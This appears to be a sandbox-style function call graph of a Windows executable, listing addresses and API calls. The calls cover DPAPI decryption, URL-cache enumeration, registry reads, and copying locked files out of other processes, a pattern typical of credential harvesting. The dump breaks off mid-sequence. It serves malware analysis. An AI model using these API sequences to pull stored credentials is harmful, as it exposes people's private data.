38319 402bde 38318->38319 38320 40b2cc 27 API calls 38319->38320 38321 402bf5 38320->38321 38322 40b2cc 27 API calls 38321->38322 38323 402c0c 38322->38323 38324 40b2cc 27 API calls 38323->38324 38325 402c23 38324->38325 38326 40b2cc 27 API calls 38325->38326 38327 402c3a 38326->38327 38328 40b2cc 27 API calls 38327->38328 38329 402c51 38328->38329 38330 40b2cc 27 API calls 38329->38330 38331 402c68 38330->38331 38332 40b2cc 27 API calls 38331->38332 38333 402c7f 38332->38333 38334 40b2cc 27 API calls 38333->38334 38335 402c99 38334->38335 38336 40b2cc 27 API calls 38335->38336 38337 402cb3 38336->38337 38338 40b2cc 27 API calls 38337->38338 38339 402cd5 38338->38339 38340 40b2cc 27 API calls 38339->38340 38341 402cf0 38340->38341 38342 40b2cc 27 API calls 38341->38342 38343 402d0b 38342->38343 38344 40b2cc 27 API calls 38343->38344 38345 402d26 38344->38345 38346 40b2cc 27 API calls 38345->38346 38347 402d3e 38346->38347 38348 40b2cc 27 API calls 38347->38348 38349 402d59 38348->38349 38350 40b2cc 27 API calls 38349->38350 38351 402d78 38350->38351 38352 40b2cc 27 API calls 38351->38352 38353 402d93 38352->38353 38354 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38353->38354 38354->38235 38355->38225 38359 40b58d 38356->38359 38358 40b2d1 38358->38301 38360 40b5a4 GetModuleHandleW FindResourceW 38359->38360 38361 40b62e 38359->38361 38362 40b5c2 LoadResource 38360->38362 38364 40b5e7 38360->38364 38361->38358 38363 40b5d0 SizeofResource LockResource 38362->38363 38362->38364 38363->38364 38364->38361 38372 40afcf 38364->38372 38366 40b608 memcpy 38375 40b4d3 memcpy 38366->38375 38368 40b61e 38376 40b3c1 18 API calls 38368->38376 38370 40b626 38377 40b04b 38370->38377 38373 40b04b ??3@YAXPAX 38372->38373 38374 40afd7 ??2@YAPAXI 38373->38374 38374->38366 38375->38368 38376->38370 38378 40b051 ??3@YAXPAX 38377->38378 38379 40b05f 38377->38379 38378->38379 38379->38361 38380->38243 38382 444a64 FreeLibrary 38381->38382 38383 444a83 38381->38383 38382->38383 38383->38245 38385 4032c4 38384->38385 38386 40b633 ??3@YAXPAX 38385->38386 38387 403316 38386->38387 38403 44553b 38387->38403 38391 403480 38601 40368c 15 API calls 38391->38601 38393 403489 38394 40b633 ??3@YAXPAX 38393->38394 38396 403495 38394->38396 38395 40333c 38395->38391 38397 4033a9 memset memcpy 38395->38397 38398 4033ec wcscmp 38395->38398 38599 4028e7 11 API calls 38395->38599 38600 40f508 6 API calls 38395->38600 38396->38245 38397->38395 38397->38398 38398->38395 38400 403421 _wcsicmp 38400->38395 38402->38246 38404 445548 38403->38404 38405 445599 38404->38405 38602 40c768 38404->38602 38406 4455a8 memset 38405->38406 38548 4457f2 38405->38548 38686 403988 38406->38686 38412 4455e5 38421 445672 38412->38421 38431 44560f 38412->38431 38414 4458bb memset memset 38418 414c2e 16 API calls 38414->38418 38416 4459ed 38422 445a00 memset memset 38416->38422 38423 445b22 38416->38423 38417 44595e memset memset 38424 414c2e 16 API calls 38417->38424 38425 4458f9 38418->38425 38419 44557a 38426 44558c 38419->38426 38666 4136c0 38419->38666 38697 403fbe memset memset memset memset memset 38421->38697 38428 414c2e 16 API calls 38422->38428 38433 445bca 38423->38433 38434 445b38 memset memset memset 38423->38434 38429 44599c 38424->38429 38430 40b2cc 27 API calls 38425->38430 38670 444b06 38426->38670 38438 445a3e 38428->38438 38440 40b2cc 27 API calls 38429->38440 38441 445909 38430->38441 38443 4087b3 335 API calls 38431->38443 38442 445c8b memset memset 38433->38442 38499 445cf0 38433->38499 38446 445bd4 38434->38446 38447 445b98 38434->38447 38435 445849 38880 40b1ab ??3@YAXPAX ??3@YAXPAX 38435->38880 38448 40b2cc 27 API calls 38438->38448 38456 4459ac 38440->38456 38452 409d1f 6 API calls 38441->38452 38457 414c2e 16 API calls 38442->38457 38453 445621 38443->38453 38445 44589f 38881 40b1ab ??3@YAXPAX ??3@YAXPAX 38445->38881 38835 414c2e 38446->38835 38447->38446 38459 445ba2 38447->38459 38461 445a4f 38448->38461 38451 403335 38598 4452e5 43 API calls 38451->38598 38467 445919 38452->38467 38866 4454bf 20 API calls 38453->38866 38454 445823 38454->38435 38476 4087b3 335 API calls 38454->38476 38455 445854 38462 4458aa 38455->38462 38812 403c9c memset memset memset memset memset 38455->38812 38468 409d1f 6 API calls 38456->38468 38469 445cc9 38457->38469 38971 4099c6 wcslen 38459->38971 38460 4456b2 38868 40b1ab ??3@YAXPAX ??3@YAXPAX 38460->38868 38473 409d1f 6 API calls 38461->38473 38462->38414 38495 44594a 38462->38495 38465 445d3d 38494 40b2cc 27 API calls 38465->38494 38466 445d88 memset memset memset 38477 414c2e 16 API calls 38466->38477 38882 409b98 GetFileAttributesW 38467->38882 38478 4459bc 38468->38478 38479 409d1f 6 API calls 38469->38479 38470 445879 38470->38445 38489 4087b3 335 API calls 38470->38489 38472 445680 38472->38460 38720 4087b3 memset 38472->38720 38482 445a63 38473->38482 38474 40b2cc 27 API calls 38483 445bf3 38474->38483 38476->38454 38486 445dde 38477->38486 38947 409b98 GetFileAttributesW 38478->38947 38488 445ce1 38479->38488 38480 445bb3 38974 445403 memset 38480->38974 38492 40b2cc 27 API calls 38482->38492 38851 409d1f wcslen wcslen 38483->38851 38484 445928 38484->38495 38883 40b6ef 38484->38883 38496 40b2cc 27 API calls 38486->38496 38991 409b98 GetFileAttributesW 38488->38991 38489->38470 38501 445a94 38492->38501 38504 445d54 _wcsicmp 38494->38504 38495->38416 38495->38417 38507 445def 38496->38507 38497 4459cb 38497->38416 38514 40b6ef 249 API calls 38497->38514 38499->38451 38499->38465 38499->38466 38500 445389 255 API calls 38500->38433 38948 40ae18 38501->38948 38502 44566d 38502->38548 38771 413d4c 38502->38771 38511 445d71 38504->38511 38575 445d67 38504->38575 38506 445665 38867 40b1ab ??3@YAXPAX ??3@YAXPAX 38506->38867 38512 409d1f 6 API calls 38507->38512 38992 445093 23 API calls 38511->38992 38519 445e03 38512->38519 38514->38416 38515 4456d8 38521 40b2cc 27 API calls 38515->38521 38518 44563c 38518->38506 38524 4087b3 335 API calls 38518->38524 38993 409b98 GetFileAttributesW 38519->38993 38520 40b6ef 249 API calls 38520->38451 38526 4456e2 38521->38526 38522 40b2cc 27 API calls 38527 445c23 38522->38527 38523 445d83 38523->38451 38524->38518 38869 413fa6 _wcsicmp _wcsicmp 38526->38869 38531 409d1f 6 API calls 38527->38531 38529 445e12 38535 445e6b 38529->38535 38542 40b2cc 27 API calls 38529->38542 38533 445c37 38531->38533 38532 4456eb 38538 4456fd memset memset memset memset 38532->38538 38539 4457ea 38532->38539 38540 445389 255 API calls 38533->38540 38534 445b17 38968 40aebe 38534->38968 38995 445093 23 API calls 38535->38995 38870 409c70 wcscpy wcsrchr 38538->38870 38873 413d29 38539->38873 38546 445c47 38540->38546 38547 445e33 38542->38547 38544 445e7e 38549 445f67 38544->38549 38552 40b2cc 27 API calls 38546->38552 38553 409d1f 6 API calls 38547->38553 38548->38455 38789 403e2d memset memset memset memset memset 38548->38789 38555 40b2cc 27 API calls 38549->38555 38550 445ab2 memset 38556 40b2cc 27 API calls 38550->38556 38558 445c53 38552->38558 38554 445e47 38553->38554 38994 409b98 GetFileAttributesW 38554->38994 38560 445f73 38555->38560 38561 445aa1 38556->38561 38557 409c70 2 API calls 38562 44577e 38557->38562 38563 409d1f 6 API calls 38558->38563 38565 409d1f 6 API calls 38560->38565 38561->38534 38561->38550 38566 409d1f 6 API calls 38561->38566 38574 445389 255 API calls 38561->38574 38955 40add4 38561->38955 38960 40ae51 38561->38960 38567 409c70 2 API calls 38562->38567 38568 445c67 38563->38568 38564 445e56 38564->38535 38572 445e83 memset 38564->38572 38569 445f87 38565->38569 38566->38561 38570 44578d 38567->38570 38571 445389 255 API calls 38568->38571 38998 409b98 GetFileAttributesW 38569->38998 38570->38539 38577 40b2cc 27 API calls 38570->38577 38571->38433 38576 40b2cc 27 API calls 38572->38576 38574->38561 38575->38451 38575->38520 38578 445eab 38576->38578 38579 4457a8 38577->38579 38580 409d1f 6 API calls 38578->38580 38581 409d1f 6 API calls 38579->38581 38582 445ebf 38580->38582 38583 4457b8 38581->38583 38584 40ae18 9 API calls 38582->38584 38872 409b98 GetFileAttributesW 38583->38872 38592 445ef5 38584->38592 38586 4457c7 38586->38539 38588 4087b3 335 API calls 38586->38588 38587 40ae51 9 API calls 38587->38592 38588->38539 38589 445f5c 38591 40aebe FindClose 38589->38591 38590 40add4 2 API calls 38590->38592 38591->38549 38592->38587 38592->38589 38592->38590 38593 40b2cc 27 API calls 38592->38593 38594 409d1f 6 API calls 38592->38594 38596 445f3a 38592->38596 38996 409b98 GetFileAttributesW 38592->38996 38593->38592 38594->38592 38997 445093 23 API calls 38596->38997 38598->38395 38599->38400 38600->38395 38601->38393 38603 40c775 38602->38603 38999 40b1ab ??3@YAXPAX ??3@YAXPAX 38603->38999 38605 40c788 39000 40b1ab ??3@YAXPAX ??3@YAXPAX 38605->39000 38607 40c790 39001 40b1ab ??3@YAXPAX ??3@YAXPAX 38607->39001 38609 40c798 38610 40aa04 ??3@YAXPAX 38609->38610 38611 40c7a0 38610->38611 39002 40c274 memset 38611->39002 38616 40a8ab 9 API calls 38617 40c7c3 38616->38617 38618 40a8ab 9 API calls 38617->38618 38619 40c7d0 38618->38619 39031 40c3c3 38619->39031 38623 40c877 38632 40bdb0 38623->38632 38624 40c86c 39059 4053fe 37 API calls 38624->39059 38627 40c813 _wcslwr 39057 40c634 47 API calls 38627->39057 38629 40c829 wcslen 38630 40c7e5 38629->38630 38630->38623 38630->38624 39056 40a706 wcslen memcpy 38630->39056 39058 40c634 47 API calls 38630->39058 39193 404363 38632->39193 38637 40b2cc 27 API calls 38638 40be02 wcslen 38637->38638 38639 40bf5d 38638->38639 38647 40be1e 38638->38647 39210 40440c 38639->39210 38640 40be26 _wcsncoll 38640->38647 38643 40be7d memset 38644 40bea7 memcpy 38643->38644 38643->38647 38645 40bf11 wcschr 38644->38645 38644->38647 38645->38647 38646 40b2cc 27 API calls 38648 40bef6 _wcsnicmp 38646->38648 38647->38639 38647->38640 38647->38643 38647->38644 38647->38645 38647->38646 38649 40bf43 LocalFree 38647->38649 39213 40bd5d 28 API calls 38647->39213 39214 404423 38647->39214 38648->38645 38648->38647 38649->38647 38650 4135f7 39226 4135e0 38650->39226 38653 40b2cc 27 API calls 38654 41360d 38653->38654 38655 40a804 8 API calls 38654->38655 38656 413613 38655->38656 38657 41363e 38656->38657 38659 40b273 27 API calls 38656->38659 38658 4135e0 FreeLibrary 38657->38658 38660 413643 38658->38660 38661 413625 38659->38661 38660->38419 38661->38657 38662 413648 38661->38662 38663 413658 38662->38663 38664 4135e0 FreeLibrary 38662->38664 38663->38419 38665 413666 38664->38665 38665->38419 38668 4136e2 38666->38668 38667 413827 38865 41366b FreeLibrary 38667->38865 38668->38667 38669 4137ac CoTaskMemFree 38668->38669 38669->38668 39229 4449b9 38670->39229 38673 444c1f 38673->38405 38674 4449b9 35 API calls 38676 444b4b 38674->38676 38675 444c15 38678 4449b9 35 API calls 38675->38678 38676->38675 39249 444972 GetVersionExW 38676->39249 38678->38673 38679 444b8c 38680 444b99 memcmp 38679->38680 38681 444c0b 38679->38681 39250 444aa5 35 API calls 38679->39250 39251 40a7a0 GetVersionExW 38679->39251 38680->38679 38687 40399d 38686->38687 39254 403a16 38687->39254 38689 403a09 39268 40b1ab ??3@YAXPAX ??3@YAXPAX 38689->39268 38691 403a12 wcsrchr 38691->38412 38692 4039a3 38692->38689 38695 4039f4 38692->38695 39265 40a02c CreateFileW 38692->39265 38695->38689 38696 4099c6 2 API calls 38695->38696 38696->38689 38698 414c2e 16 API calls 38697->38698 38699 404048 38698->38699 38700 414c2e 16 API calls 38699->38700 38701 404056 38700->38701 38702 409d1f 6 API calls 38701->38702 38703 404073 38702->38703 38704 409d1f 6 API calls 38703->38704 38705 40408e 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 4040a6 38706->38707 38708 403af5 20 API calls 38707->38708 38709 4040ba 38708->38709 38710 403af5 20 API calls 38709->38710 38711 4040cb 38710->38711 39295 40414f memset 38711->39295 38713 404140 39309 40b1ab ??3@YAXPAX ??3@YAXPAX 38713->39309 38715 4040ec memset 38718 4040e0 38715->38718 38716 404148 38716->38472 38717 4099c6 2 API calls 38717->38718 38718->38713 38718->38715 38718->38717 38719 40a8ab 9 API calls 38718->38719 38719->38718 39322 40a6e6 WideCharToMultiByte 38720->39322 38722 4087ed 39323 4095d9 memset 38722->39323 38725 408809 memset memset memset memset memset 38726 40b2cc 27 API calls 38725->38726 38727 4088a1 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 4088b1 38728->38729 38730 40b2cc 27 API calls 38729->38730 38731 4088c0 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 4088d0 38732->38733 38734 40b2cc 27 API calls 38733->38734 38735 4088df 38734->38735 38757 408953 38757->38472 38772 40b633 ??3@YAXPAX 38771->38772 38773 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38772->38773 38774 413f00 Process32NextW 38773->38774 38775 413da5 OpenProcess 38774->38775 38776 413f17 CloseHandle 38774->38776 38777 413df3 memset 38775->38777 38780 413eb0 38775->38780 38776->38515 39372 413f27 38777->39372 38779 413ebf ??3@YAXPAX 38779->38780 38780->38774 38780->38779 38781 4099f4 3 API calls 38780->38781 38781->38780 38782 413e37 GetModuleHandleW 38784 413e46 38782->38784 38786 413e1f 38782->38786 38784->38786 38785 413e6a QueryFullProcessImageNameW 38785->38786 38786->38782 38786->38785 39377 413959 38786->39377 39393 413ca4 38786->39393 38788 413ea2 CloseHandle 38788->38780 38790 414c2e 16 API calls 38789->38790 38791 403eb7 38790->38791 38792 414c2e 16 API calls 38791->38792 38793 403ec5 38792->38793 38794 409d1f 6 API calls 38793->38794 38795 403ee2 38794->38795 38796 409d1f 6 API calls 38795->38796 38797 403efd 38796->38797 38798 409d1f 6 API calls 38797->38798 38799 403f15 38798->38799 38800 403af5 20 API calls 38799->38800 38801 403f29 38800->38801 38802 403af5 20 API calls 38801->38802 38803 403f3a 38802->38803 38804 40414f 33 API calls 38803->38804 38810 403f4f 38804->38810 38805 403faf 39406 40b1ab ??3@YAXPAX ??3@YAXPAX 38805->39406 38806 403f5b memset 38806->38810 38808 403fb7 38808->38454 38809 4099c6 2 API calls 38809->38810 38810->38805 38810->38806 38810->38809 38811 40a8ab 9 API calls 38810->38811 38811->38810 38813 414c2e 16 API calls 38812->38813 38814 403d26 38813->38814 38815 414c2e 16 API calls 38814->38815 38816 403d34 38815->38816 38817 409d1f 6 API calls 38816->38817 38818 403d51 38817->38818 38819 409d1f 6 API calls 38818->38819 38820 403d6c 38819->38820 38821 409d1f 6 API calls 38820->38821 38822 403d84 38821->38822 38823 403af5 20 API calls 38822->38823 38824 403d98 38823->38824 38825 403af5 20 API calls 38824->38825 38826 403da9 38825->38826 38827 40414f 33 API calls 38826->38827 38833 403dbe 38827->38833 38828 403e1e 39407 40b1ab ??3@YAXPAX ??3@YAXPAX 38828->39407 38829 403dca memset 38829->38833 38831 403e26 38831->38470 38832 4099c6 2 API calls 38832->38833 38833->38828 38833->38829 38833->38832 38834 40a8ab 9 API calls 38833->38834 38834->38833 38836 414b81 8 API calls 38835->38836 38837 414c40 38836->38837 38838 414c73 memset 38837->38838 39408 409cea 38837->39408 38840 414c94 38838->38840 39411 414592 RegOpenKeyExW 38840->39411 38842 414c64 SHGetSpecialFolderPathW 38844 414d0b 38842->38844 38844->38474 38845 414cc1 38846 414cf4 wcscpy 38845->38846 39412 414bb0 wcscpy 38845->39412 38846->38844 38848 414cd2 39413 4145ac RegQueryValueExW 38848->39413 38850 414ce9 RegCloseKey 38850->38846 38852 409d62 38851->38852 38853 409d43 wcscpy 38851->38853 38856 445389 38852->38856 38854 409719 2 API calls 38853->38854 38855 409d51 wcscat 38854->38855 38855->38852 38857 40ae18 9 API calls 38856->38857 38862 4453c4 38857->38862 38858 40ae51 9 API calls 38858->38862 38859 4453f3 38861 40aebe FindClose 38859->38861 38860 40add4 2 API calls 38860->38862 38863 4453fe 38861->38863 38862->38858 38862->38859 38862->38860 38864 445403 250 API calls 38862->38864 38863->38522 38864->38862 38865->38426 38866->38518 38867->38502 38868->38502 38869->38532 38871 409c89 38870->38871 38871->38557 38872->38586 38874 413d39 38873->38874 38875 413d2f FreeLibrary 38873->38875 38876 40b633 ??3@YAXPAX 38874->38876 38875->38874 38877 413d42 38876->38877 38878 40b633 ??3@YAXPAX 38877->38878 38879 413d4a 38878->38879 38879->38548 38880->38455 38881->38462 38882->38484 38884 44db70 38883->38884 38885 40b6fc memset 38884->38885 38886 409c70 2 API calls 38885->38886 38887 40b732 wcsrchr 38886->38887 38888 40b743 38887->38888 38889 40b746 memset 38887->38889 38888->38889 38890 40b2cc 27 API calls 38889->38890 38891 40b76f 38890->38891 38892 409d1f 6 API calls 38891->38892 38893 40b783 38892->38893 39414 409b98 GetFileAttributesW 38893->39414 38895 40b792 38897 409c70 2 API calls 38895->38897 38909 40b7c2 38895->38909 38899 40b7a5 38897->38899 38902 40b2cc 27 API calls 38899->38902 38900 40b837 CloseHandle 38904 40b83e memset 38900->38904 38901 40b817 39518 409a45 GetTempPathW 38901->39518 38905 40b7b2 38902->38905 39448 40a6e6 WideCharToMultiByte 38904->39448 38906 409d1f 6 API calls 38905->38906 38906->38909 38907 40b827 38907->38904 39415 40bb98 38909->39415 38910 40b866 39449 444432 38910->39449 38913 40bad5 38916 40b04b ??3@YAXPAX 38913->38916 38914 40b273 27 API calls 38915 40b89a 38914->38915 39495 438552 38915->39495 38918 40baf3 38916->38918 38918->38495 38920 40bacd 39498 443d90 38920->39498 38923 40bac6 39548 424f26 122 API calls 38923->39548 38924 40b8bd memset 39539 425413 17 API calls 38924->39539 38927 425413 17 API calls 38945 40b8b8 38927->38945 38930 40a71b MultiByteToWideChar 38930->38945 38931 40a734 MultiByteToWideChar 38931->38945 38934 40b9b5 memcmp 38934->38945 38935 4099c6 2 API calls 38935->38945 38936 404423 37 API calls 38936->38945 38939 4251c4 136 API calls 38939->38945 38940 40bb3e memset memcpy 39549 40a734 MultiByteToWideChar 38940->39549 38942 40bb88 LocalFree 38942->38945 38945->38923 38945->38924 38945->38927 38945->38930 38945->38931 38945->38934 38945->38935 38945->38936 38945->38939 38945->38940 38946 40ba5f memcmp 38945->38946 39540 4253ef 16 API calls 38945->39540 39541 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38945->39541 39542 4253af 17 API calls 38945->39542 39543 4253cf 17 API calls 38945->39543 39544 447280 memset 38945->39544 39545 447960 memset memcpy memcpy memcpy 38945->39545 39546 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38945->39546 39547 447920 memcpy memcpy memcpy 38945->39547 38946->38945 38947->38497 38949 40aebe FindClose 38948->38949 38950 40ae21 38949->38950 38951 4099c6 2 API calls 38950->38951 38952 40ae35 38951->38952 38953 409d1f 6 API calls 38952->38953 38954 40ae49 38953->38954 38954->38561 38956 40ade0 38955->38956 38959 40ae0f 38955->38959 38957 40ade7 wcscmp 38956->38957 38956->38959 38958 40adfe wcscmp 38957->38958 38957->38959 38958->38959 38959->38561 38961 40ae7b FindNextFileW 38960->38961 38962 40ae5c FindFirstFileW 38960->38962 38963 40ae94 38961->38963 38964 40ae8f 38961->38964 38962->38963 38966 40aeb6 38963->38966 38967 409d1f 6 API calls 38963->38967 38965 40aebe FindClose 38964->38965 38965->38963 38966->38561 38967->38966 38969 40aed1 38968->38969 38970 40aec7 FindClose 38968->38970 38969->38423 38970->38969 38972 4099d7 38971->38972 38973 4099da memcpy 38971->38973 38972->38973 38973->38480 38975 40b2cc 27 API calls 38974->38975 38976 44543f 38975->38976 38977 409d1f 6 API calls 38976->38977 38978 44544f 38977->38978 39943 409b98 GetFileAttributesW 38978->39943 38980 44545e 38981 445476 38980->38981 38982 40b6ef 249 API calls 38980->38982 38983 40b2cc 27 API calls 38981->38983 38982->38981 38984 445482 38983->38984 38985 409d1f 6 API calls 38984->38985 38986 445492 38985->38986 39944 409b98 GetFileAttributesW 38986->39944 38988 4454a1 38989 4454b9 38988->38989 38990 40b6ef 249 API calls 38988->38990 38989->38500 38990->38989 38991->38499 38992->38523 38993->38529 38994->38564 38995->38544 38996->38592 38997->38592 38998->38575 38999->38605 39000->38607 39001->38609 39003 414c2e 16 API calls 39002->39003 39004 40c2ae 39003->39004 39060 40c1d3 39004->39060 39009 40c3be 39026 40a8ab 39009->39026 39010 40afcf 2 API calls 39011 40c2fd FindFirstUrlCacheEntryW 39010->39011 39012 40c3b6 39011->39012 39013 40c31e wcschr 39011->39013 39014 40b04b ??3@YAXPAX 39012->39014 39015 40c331 39013->39015 39016 40c35e FindNextUrlCacheEntryW 39013->39016 39014->39009 39018 40a8ab 9 API calls 39015->39018 39016->39013 39017 40c373 GetLastError 39016->39017 39019 40c3ad FindCloseUrlCache 39017->39019 39020 40c37e 39017->39020 39021 40c33e wcschr 39018->39021 39019->39012 39022 40afcf 2 API calls 39020->39022 39021->39016 39023 40c34f 39021->39023 39024 40c391 FindNextUrlCacheEntryW 39022->39024 39025 40a8ab 9 API calls 39023->39025 39024->39013 39024->39019 39025->39016 39154 40a97a 39026->39154 39029 40a8cc 39029->38616 39030 40a8d0 7 API calls 39030->39029 39159 40b1ab ??3@YAXPAX ??3@YAXPAX 39031->39159 39033 40c3dd 39034 40b2cc 27 API calls 39033->39034 39035 40c3e7 39034->39035 39160 414592 RegOpenKeyExW 39035->39160 39037 40c3f4 39038 40c50e 39037->39038 39039 40c3ff 39037->39039 39053 405337 39038->39053 39040 40a9ce 4 API calls 39039->39040 39041 40c418 memset 39040->39041 39161 40aa1d 39041->39161 39044 40c471 39046 40c47a _wcsupr 39044->39046 39045 40c505 RegCloseKey 39045->39038 39047 40a8d0 7 API calls 39046->39047 39048 40c498 39047->39048 39049 40a8d0 7 API calls 39048->39049 39050 40c4ac memset 39049->39050 39051 40aa1d 39050->39051 39052 40c4e4 RegEnumValueW 39051->39052 39052->39045 39052->39046 39163 405220 39053->39163 39055 405340 39055->38630 39056->38627 39057->38629 39058->38630 39059->38623 39061 40ae18 9 API calls 39060->39061 39067 40c210 39061->39067 39062 40ae51 9 API calls 39062->39067 39063 40c264 39064 40aebe FindClose 39063->39064 39066 40c26f 39064->39066 39065 40add4 2 API calls 39065->39067 39072 40e5ed memset memset 39066->39072 39067->39062 39067->39063 39067->39065 39068 40c231 _wcsicmp 39067->39068 39069 40c1d3 34 API calls 39067->39069 39068->39067 39070 40c248 39068->39070 39069->39067 39085 40c084 21 API calls 39070->39085 39073 414c2e 16 API calls 39072->39073 39074 40e63f 39073->39074 39075 409d1f 6 API calls 39074->39075 39076 40e658 39075->39076 39086 409b98 GetFileAttributesW 39076->39086 39078 40e667 39079 409d1f 6 API calls 39078->39079 39081 40e680 39078->39081 39079->39081 39087 409b98 GetFileAttributesW 39081->39087 39082 40e68f 39083 40c2d8 39082->39083 39088 40e4b2 39082->39088 39083->39009 39083->39010 39085->39067 39086->39078 39087->39082 39109 40e01e 39088->39109 39090 40e593 39091 40e5b0 39090->39091 39092 40e59c DeleteFileW 39090->39092 39093 40b04b ??3@YAXPAX 39091->39093 39092->39091 39095 40e5bb 39093->39095 39094 40e521 39094->39090 39132 40e175 39094->39132 39097 40e5c4 CloseHandle 39095->39097 39098 40e5cc 39095->39098 39097->39098 39101 40b633 ??3@YAXPAX 39098->39101 39099 40e540 39100 40e573 39099->39100 39152 40e2ab 30 API calls 39099->39152 39102 40e584 39100->39102 39103 40e57c CloseHandle 39100->39103 39104 40e5db 39101->39104 39153 40b1ab ??3@YAXPAX ??3@YAXPAX 39102->39153 39103->39102 39105 40b633 ??3@YAXPAX 39104->39105 39107 40e5e3 39105->39107 39107->39083 39110 406214 22 API calls 39109->39110 39111 40e03c 39110->39111 39112 40e16b 39111->39112 39113 40dd85 60 API calls 39111->39113 39112->39094 39114 40e06b 39113->39114 39114->39112 39115 40afcf ??2@YAPAXI ??3@YAXPAX 39114->39115 39116 40e08d OpenProcess 39115->39116 39117 40e0a4 GetCurrentProcess DuplicateHandle 39116->39117 39121 40e152 39116->39121 39118 40e0d0 GetFileSize 39117->39118 39119 40e14a CloseHandle 39117->39119 39122 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39118->39122 39119->39121 39120 40e160 39124 40b04b ??3@YAXPAX 39120->39124 39121->39120 39123 406214 22 API calls 39121->39123 39125 40e0ea 39122->39125 39123->39120 39124->39112 39126 4096dc CreateFileW 39125->39126 39127 40e0f1 CreateFileMappingW 39126->39127 39128 40e140 CloseHandle CloseHandle 39127->39128 39129 40e10b MapViewOfFile 39127->39129 39128->39119 39130 40e13b CloseHandle 39129->39130 39131 40e11f WriteFile UnmapViewOfFile 39129->39131 39130->39128 39131->39130 39133 40e18c 39132->39133 39134 406b90 11 API calls 39133->39134 39135 40e19f 39134->39135 39136 40e1a7 memset 39135->39136 39137 40e299 39135->39137 39143 40e1e8 39136->39143 39138 4069a3 ??3@YAXPAX ??3@YAXPAX 39137->39138 39139 40e2a4 39138->39139 39139->39099 39140 406e8f 13 API calls 39140->39143 39141 406b53 SetFilePointerEx ReadFile 39141->39143 39142 40dd50 _wcsicmp 39142->39143 39143->39140 39143->39141 39143->39142 39144 40e283 39143->39144 39148 40742e 8 API calls 39143->39148 39149 40aae3 wcslen wcslen _memicmp 39143->39149 39150 40e244 _snwprintf 39143->39150 39145 40e291 39144->39145 39146 40e288 ??3@YAXPAX 39144->39146 39147 40aa04 ??3@YAXPAX 39145->39147 39146->39145 39147->39137 39148->39143 39149->39143 39151 40a8d0 7 API calls 39150->39151 39151->39143 39152->39099 39153->39090 39156 40a980 39154->39156 39155 40a8bb 39155->39029 39155->39030 39156->39155 39157 40a995 _wcsicmp 39156->39157 39158 40a99c wcscmp 39156->39158 39157->39156 39158->39156 39159->39033 39160->39037 39162 40aa23 RegEnumValueW 39161->39162 39162->39044 39162->39045 39164 40522a 39163->39164 39189 405329 39163->39189 39165 40b2cc 27 API calls 39164->39165 39166 405234 39165->39166 39167 40a804 8 API calls 39166->39167 39168 40523a 39167->39168 39190 40b273 39168->39190 39170 405248 _mbscpy _mbscat 39171 40526c 39170->39171 39172 40b273 27 API calls 39171->39172 39173 405279 39172->39173 39174 40b273 27 API calls 39173->39174 39175 40528f 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4052a5 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4052bb 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4052d1 39180->39181 39182 40b273 27 API calls 39181->39182 39183 4052e7 39182->39183 39184 40b273 27 API calls 39183->39184 39185 4052fd 39184->39185 39186 40b273 27 API calls 39185->39186 39187 405313 39186->39187 39188 40b273 27 API calls 39187->39188 39188->39189 39189->39055 39191 40b58d 27 API calls 39190->39191 39192 40b18c 39191->39192 39192->39170 39194 40440c FreeLibrary 39193->39194 39195 40436d 39194->39195 39196 40a804 8 API calls 39195->39196 39197 404377 39196->39197 39198 4043f7 39197->39198 39199 40b273 27 API calls 39197->39199 39198->38637 39198->38639 39200 40438d 39199->39200 39201 40b273 27 API calls 39200->39201 39202 4043a7 39201->39202 39203 40b273 27 API calls 39202->39203 39204 4043ba 39203->39204 39205 40b273 27 API calls 39204->39205 39206 4043ce 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4043e2 39207->39208 39208->39198 39209 40440c FreeLibrary 39208->39209 39209->39198 39211 404413 FreeLibrary 39210->39211 39212 40441e 39210->39212 39211->39212 39212->38650 39213->38647 39215 40447e 39214->39215 39216 40442e 39214->39216 39217 404485 CryptUnprotectData 39215->39217 39218 40449c 39215->39218 39219 40b2cc 27 API calls 39216->39219 39217->39218 39218->38647 39220 404438 39219->39220 39221 40a804 8 API calls 39220->39221 39222 40443e 39221->39222 39223 40444f 39222->39223 39224 40b273 27 API calls 39222->39224 39223->39215 39225 404475 FreeLibrary 39223->39225 39224->39223 39225->39215 39227 4135f6 39226->39227 39228 4135eb FreeLibrary 39226->39228 39227->38653 39228->39227 39230 4449c4 39229->39230 39248 444a48 39229->39248 39231 40b2cc 27 API calls 39230->39231 39232 4449cb 39231->39232 39233 40a804 8 API calls 39232->39233 39234 4449d1 39233->39234 39235 40b273 27 API calls 39234->39235 39248->38673 39248->38674 39249->38679 39250->38679 39251->38679 39255 403a29 39254->39255 39269 403bed memset memset 39255->39269 39257 403ae7 39282 40b1ab ??3@YAXPAX ??3@YAXPAX 39257->39282 39258 403a3f memset 39261 403a2f 39258->39261 39260 403aef 39260->38692 39261->39257 39261->39258 39262 409d1f 6 API calls 39261->39262 39263 409b98 GetFileAttributesW 39261->39263 39264 40a8d0 7 API calls 39261->39264 39262->39261 39263->39261 39264->39261 39266 40a051 GetFileTime CloseHandle 39265->39266 39267 4039ca CompareFileTime 39265->39267 39266->39267 39267->38692 39268->38691 39270 414c2e 16 API calls 39269->39270 39271 403c38 39270->39271 39272 409719 2 API calls 39271->39272 39273 403c3f wcscat 39272->39273 39274 414c2e 16 API calls 39273->39274 39275 403c61 39274->39275 39276 409719 2 API calls 39275->39276 39277 403c68 wcscat 39276->39277 39283 403af5 39277->39283 39280 403af5 20 API calls 39281 403c95 39280->39281 39281->39261 39282->39260 39284 403b02 39283->39284 39285 40ae18 9 API calls 39284->39285 39293 403b37 39285->39293 39286 403bdb 39288 40aebe FindClose 39286->39288 39287 40add4 wcscmp wcscmp 39287->39293 39289 403be6 39288->39289 39289->39280 39290 40ae18 9 API calls 39290->39293 39291 40ae51 9 API calls 39291->39293 39292 